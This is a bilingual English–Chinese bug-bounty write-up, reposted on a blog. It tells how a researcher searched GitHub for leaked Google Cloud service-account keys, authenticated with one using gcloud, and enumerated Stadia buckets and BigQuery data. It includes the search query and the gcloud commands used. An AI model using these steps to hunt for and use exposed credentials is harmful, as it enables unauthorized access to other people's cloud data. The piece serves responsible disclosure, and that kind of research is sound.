【转载】【漏洞分析】Gaining Access To GCP Of Google Stadia — 500$ Bounty

Introduction

引言

First of all, I must admit that the story is a bit old. It took place in July 2019.

首先,我必须承认这个故事有点老了,它发生在2019年7月。

At that time, I have learnt the approach of machine-based authentication in the cloud. In particular, reading disclosed HackerOne server-side request forgery and similar vulnerability reports with the technique of gaining access to the cloud provider by connecting to the internal metadata endpoint, retrieving a service account token, and using the exfiltrated service account / token to authenticate from outside, was the key to my success. This lead me to the idea that instead of searching for SSRF (or related) vulnerabilities in a single target, I should try my luck in the big wide world of OSINT.

当时,我已经学会了在云中基于机器的身份验证方法。具体而言,阅读揭示了 HackerOne 服务器端请求伪造和类似的漏洞报告技术,通过连接到内部元数据端点,检索服务帐户令牌,并使用外部过滤的服务帐户/令牌从外部验证,获得访问云提供商的权限,是我成功的关键。这让我想到,与其在单一目标中搜索 SSRF (或相关)漏洞,不如在 OSINT 这个广阔的世界中碰碰运气。

As far as I can remember, Github was not scanning for exposed tokens at that time. Encountering exposed credentials was painless.

据我所知,当时 Github 并没有扫描暴露的令牌。遇到暴露的凭据是没有痛苦的。

Finding a search query

查找搜索查询

The first step is, of course, to find a way to find these services accounts. My approach is to find a unique string in the target to narrow down the search results. For example, long-term AWS IAM access key ids begin with AKIA and temporary credentials with ASIA . Google service accounts were unknown to me, I needed to lookup the structure and identify potential needles.

当然,第一步是找到一种方法来查找这些服务帐户。我的方法是在目标中找到一个唯一的字符串来缩小搜索结果的范围。例如,长期 AWS IAM 访问密钥 id 开始于 AKIA 和与 ASIA 的临时凭证。谷歌服务账户对我来说是未知的,我需要查找结构和识别潜在的针头。

https://cloud.google.com/iam/docs/creating-managing-service-account-keys

All service-account-email values apparently end with iam.gserviceaccount.com according to the Google Cloud documentation.

根据 Google Cloud 的文档,所有的服务帐户和电子邮件的价值都以 iam.gserviceaccount.com 结束。

By searching with that needle, the Github search result quality has really increased. Nonetheless, there is still room for improvement. For instance, since the service account is often a JSON structure, it is not hard to imagine that a Github user exposes their service account in a dot JSON file. The search query could look like this:

通过使用这根针进行搜索,Github 的搜索结果质量确实提高了。尽管如此,仍有改进的空间。例如,因为服务帐户通常是一个 JSON 结构,所以不难想象 Github 用户会在一个点 JSON 文件中公开他们的服务帐户。搜索查询可以是这样的:

iam.gserviceaccount.com extension:json

It is of course possible that a Google service account is stored in other file formats.

当然,谷歌服务帐户也有可能以其他文件格式存储。

In my case, the service account token was written inside a dot YAML file (the file was used in a DevOps automation tool).

在我的例子中,服务帐户令牌写在一个点 YAML 文件中(该文件用于 DevOps 自动化工具)。

Using the Google Cloud Service Account

使用谷歌云服务帐户

At this point, the owner of the Google service account was still unclear and I needed a way to identify the owner. Wouldn’t it be great if AWS or any similar credential issuer allows security researchers to look up the owner? I guess there would be some sort of privacy implication but it would really help in some cases.

在这一点上,谷歌服务帐户的所有者仍然不清楚,我需要一个方法来确定所有者。如果 AWS 或任何类似的凭证发行机构允许安全研究人员查询所有者,那不是很棒吗?我想这可能会涉及到一些隐私问题,但在某些情况下确实会有所帮助。

I use a variety of tools to identify the owner. I haven’t found any easier way than listing all Google cloud resources and then trying to associate the data with a company.

我使用各种工具来识别所有者。我没有找到比列出所有 Google 云资源,然后试图将数据与一家公司联系起来更简单的方法了。

To begin with, the Google cloud command-line interface with a small script is a great help. I start with revoking any previous access tokens from my environment (because you don’t want to target older findings).

首先,使用小脚本的 Google 云计算命令行界面是一个很大的帮助。我首先从我的环境中撤销以前的所有访问令牌(因为您不希望针对旧的发现)。

gcloud auth revoke --all

Next, I copy the exposed service account into a JSON file (assuming the origin service account is also JSON, otherwise you might need to fiddle around) and tell gcloud to use it.

接下来,我将公开的服务帐户复制到一个 JSON 文件中(假设原始服务帐户也是 JSON,否则您可能需要胡乱操作) ,并告诉 gcloud 使用它。

gcloud auth activate-service-account --key-file service-account.json

Gcloud needs to know the project id which can be retrieved from the JSON file.

Gcloud 需要知道可以从 JSON 文件检索到的项目 id。

gcloud config set project your-project-name

Finally, you can use the command line interface to communicate with the Google Cloud.

最后,您可以使用命令行界面与 googlecloud 进行通信。

Instead of manually querying every Google cloud resource, I found it very convenient to just use the following script https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541 (you need to change the project id on line 4).

与手动查询每一个 Google 云资源不同,我发现使用下面的脚本 https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541查询非常方便(你需要在第4行更改项目 id)。

Another way is ScoutSuite from NCC Group. You can find it here https://github.com/nccgroup/ScoutSuite. It might give you even better results but the script allows a quicker overview in my opinion.

另一种方式是 NCC 集团的 ScoutSuite。你可以在这里找到它的 https://github.com/nccgroup/scoutsuite。它可能会给你更好的结果,但是在我看来,这个脚本允许更快的概述。

Note: Your service account might have access to other projects. It is a good idea to list all accessible projects with gcloud projects list and to check each project for information.

注意: 您的服务帐户可能可以访问其他项目。使用 gcloud 项目列表列出所有可访问的项目,并检查每个项目的信息,这是一个好主意。

I like to have the dumped information in a code editor for an easier overview. You can accomplish that by piping the output into a file like this:

我喜欢在代码编辑器中存储转储的信息,以便更容易地进行概述。你可以通过管道输出到一个文件中来实现:

bash gcp_enum.sh >> out.txt

The first 48 lines of the output. 输出的前48行

The output size was astonishing. 109.818 lines, of which 108.466 lines are buckets. Many buckets were boring because they were suffixed buckets; maybe “versioned” buckets for log files?

产出规模惊人。109.818行,其中108.466行是桶。许多存储桶很无聊,因为它们是后缀存储桶; 也许是日志文件的“版本化”存储桶?

108.150 buckets are suffixed buckets 108.150个桶是后缀桶

The other 316 buckets had interesting names; containing the words “backup”, “prod”, “automation”, “jenkins”, “stadia + “backups”, “logs”, “gpg”, “ssh”, “deployments”, “scripts”, “dumps” and more.

其他316个存储桶的名称很有趣,包括“ backup”、“ prod”、“ automation”、“ jenkins”、“ stadia”+ “ backup”、“ logs”、“ gpg”、“ ssh”、“ deployments”、“ scripts”、“ dumps”等词。

I had not only access to these buckets but also to BigQuery and other cloud resources.

我不仅可以访问这些存储桶,还可以访问 BigQuery 和其他云资源。

Stadia Analytics Dataset in BigQuery BigQuery 中的视场分析数据集

At that time, I was really happy and thought that access to production data would gain me a good amount of $$$$$ but Google paid me a bounty of 500$.

那时候,我真的很高兴,并且认为访问生产数据可以给我带来一大笔钱,但是谷歌给了我500美元的奖金。

发表评论

Fill in your details below or click an icon to log in:

WordPress.com 徽标

您正在使用您的 WordPress.com 账号评论。 注销 /  更改 )

Google photo

您正在使用您的 Google 账号评论。 注销 /  更改 )

Twitter picture

您正在使用您的 Twitter 账号评论。 注销 /  更改 )

Facebook photo

您正在使用您的 Facebook 账号评论。 注销 /  更改 )

Connecting to %s